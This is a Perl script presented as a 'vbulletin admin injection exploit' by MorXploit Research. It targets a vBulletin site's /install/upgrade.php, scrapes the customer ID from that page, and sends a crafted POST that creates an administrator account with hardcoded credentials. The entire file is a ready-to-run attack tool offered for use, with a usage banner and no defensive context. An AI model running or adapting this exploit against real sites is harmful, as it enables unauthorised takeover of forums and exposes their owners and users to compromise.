#!/usr/bin/perl
use strict;
use IO::Socket;
if(!defined($ARGV[0])) {
system ('clear');
print "\n";
print "===================================================\n";
print "— vbulletin admin injection exploit\n";
print "— By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "— MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
print "— Usage: perl $0 target\n\n";
exit; }
my $site = $ARGV[0];
my $user = "MorXploit";
my $passwd = "m0rxpl017";
my $email = "dev%40null.com";
my $path = "/install/upgrade.php";
##################################
my $accept = "Accept: /";
my $ct = "application/x-www-form-urlencoded";
my $port = "80";
system ('clear');
print "\n";
print "===================================================\n";
print "— vbulletin admin injection exploit\n";
print "— By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "— MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
my $sock = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
print "[*] Trying to get customer number … hold on!\n";
print $sock "GET $path HTTP/1.1\n";
print $sock "Host: $site\n";
print $sock "$accept\n";
print $sock "Content-Type: $ct\n";
print $sock "Connection: Close\n\n";
my $gotcn;
while(my $cn = <$sock>) {
if ($cn =~ /CUSTNUMBER = \"(.*?)\"/){
$gotcn = $1;
}
}
if (!defined $gotcn) {
print "[-] Failed to get customer number! Nulled? Going to try anyway!\n";
}
else {
print "[+] Got $gotcn!\n";
}
my $xploit = "ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0&only=false&customerid=$gotcn&options[skiptemplatemerge]=0&response=yes&htmlsubmit=1&htmldata[username]=$user&htmldata[password]=$passwd&htmldata[confirmpassword]=$passwd&htmldata[email]=$email";
my $cl = length($xploit);
my $content = "Content-Length: $cl";
my $sock2 = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
print "[*] Trying to MorXploit $site … hold on!\n";
print $sock2 "POST $path HTTP/1.1\n";
print $sock2 "Host: $site\n";
print $sock2 "$accept\n";
print $sock2 "Cookie: bbcustomerid=$gotcn\n";
print $sock2 "Content-Length: $cl\n";
print $sock2 "Content-Type: $ct\n";
print $sock2 "Connection: Close\n\n";
print $sock2 "$xploit\n\n";
while(my $result = <$sock2>){
if ($result =~ /Administrator account created/) {
print "[+] Admin account successfully injected!\n";
print "[+] Admin: $user\n";
print "[+] Pass: $passwd\n";
exit;
}
}
print "[-] Failed, something went wrong\n";
exit;